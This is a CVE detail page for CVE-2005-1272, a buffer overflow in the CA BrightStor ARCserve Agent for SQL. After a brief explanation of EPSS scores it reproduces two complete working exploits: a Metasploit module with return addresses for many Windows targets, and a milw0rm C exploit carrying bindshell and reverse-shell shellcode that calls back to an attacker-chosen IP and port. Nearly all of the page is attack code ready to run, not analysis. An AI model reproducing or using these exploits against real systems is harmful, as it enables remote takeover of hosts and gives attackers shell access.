CVE-2005-1272 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # $Id: sql_agent.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'CA BrightStor Agent for Microsoft SQL Overflow', 'Description' => %q{ This module exploits a vulnerability in the CA BrightStor Agent for Microsoft SQL Server. This vulnerability was discovered by cybertronic[at]gmx.net. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2005-1272'], [ 'OSVDB', '18501' ], [ 'BID', '14453'], [ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'], [ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'], ], 'Privileged' => true, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Targets' => [ # This exploit requires a jmp esp for return ['ARCServe 11.0 Asbrdcst.dll 12/12/2003', { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp ['ARCServe 11.1 Asbrdcst.dll 07/21/2004', { 'Platform' => 'win', 'Ret' => 0x20c0cd5b }], # push esp, ret ['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', { 'Platform' => 'win', 'Ret' => 0x20c0cd1b }], # push esp, ret # Generic jmp esp's ['Windows 2000 SP0-SP3 English', { 'Platform' => 'win', 'Ret' => 0x7754a3ab }], # jmp esp ['Windows 2000 SP4 English', { 'Platform' => 'win', 'Ret' => 0x7517f163 }], # jmp esp ['Windows XP SP0-SP1 English', { 'Platform' => 'win', 'Ret' => 0x71ab1d54 }], # push esp, ret ['Windows XP SP2 English', { 'Platform' => 'win', 'Ret' => 0x71ab9372 }], # push esp, ret ['Windows 2003 SP0 English', { 'Platform' => 'win', 'Ret' => 0x71c03c4d }], # push esp, ret ['Windows 2003 SP1 English', { 'Platform' => 'win', 'Ret' => 0x71c033a0 }], # push esp, ret ], 'DisclosureDate' => 'Aug 02 2005', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(6070) ], self.class) end def exploit print_status("Trying target #{target.name}...") # The 'one line' request does not work against Windows 2003 1.upto(5) { |i| # Flush some memory connect begin sock.put("\xff" * 0x12000) sock.get_once rescue end disconnect # 3288 bytes max # 696 == good data (1228 bytes contiguous) @ 0293f5e0 # 3168 == return address # 3172 == esp @ 0293ff8c (2476 from good data) buf = rand_text_english(3288, payload_badchars) buf[ 696, payload.encoded.length ] = payload.encoded buf[3168, 4] = [target.ret].pack('V') # jmp esp buf[3172, 5] = "\xe9\x4f\xf6\xff\xff" # jmp -2476 connect begin sock.put(buf) sock.get_once rescue end handler disconnect } end end

/* * CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe * * cybertronic[at]gmx[dot]net * */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define PORT 6070 unsigned char bindshell[] = "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32" "\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff" "\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a" "\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d" "\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc" "\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90" "\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b" "\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2" "\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2" "\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2" "\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2" "\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2" "\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2" "\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b" "\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4" "\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96" "\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2" "\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7" "\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d" "\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d" "\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0" "\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f" "\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2" "\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98" "\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94" "\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0" "\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4" "\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38" "\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1" "\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f" "\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90" "\x80\x2f\xa2\x04"; unsigned char reverseshell[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9" "\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3" "\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE" "\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99" "\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF" "\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6" "\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF" "\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD" "\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD" "\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD" "\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66" "\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66" "\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB" "\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3" "\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3" "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D" "\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75" "\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2" "\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0"; void exploit ( int s, unsigned long cbip, unsigned short cbport, int option ) { unsigned long pushesp = 0x20c0c1ab; char buffer[3289]; bzero ( &buffer, sizeof ( buffer ) ); memset ( buffer, 0x41, sizeof ( buffer ) - 1 ); memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 ); memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 ); memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 ); if ( option == 0 ) { memcpy ( &reverseshell[111], &cbip, 4); memcpy ( &reverseshell[118], &cbport, 2); memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 ); } else memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 ); printf ( "attacking with %u bytes...", strlen ( buffer ) ); write ( s, buffer, strlen ( buffer ) ); printf ( "done!\n" ); close ( s ); } int main ( int argc, char* argv[] ) { int s; unsigned long cbip; unsigned short cbport; struct sockaddr_in remote_addr; struct hostent* host_addr; if ( argc != 2 ) if ( argc != 4 ) { fprintf ( stderr, "Usage\n-----\n[bindshell] %s <ip>\n[reverseshell] %s <ip> <cbip> <cbport>\n", argv[0], argv[0] ); exit ( 1 ); } if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) { fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1 ); } remote_addr.sin_family = AF_INET; remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); remote_addr.sin_port = htons ( PORT ); s = socket ( AF_INET, SOCK_STREAM, 0 ); printf ( "connecting to %s:%u...", argv[1], PORT ); if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( "failed!\n" ); exit ( 1 ); } printf ( "ok!\n" ); if ( argc == 4 ) { cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999; cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999; exploit ( s, cbip, cbport, 0 ); } else exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ); } // milw0rm.com [2005-08-03]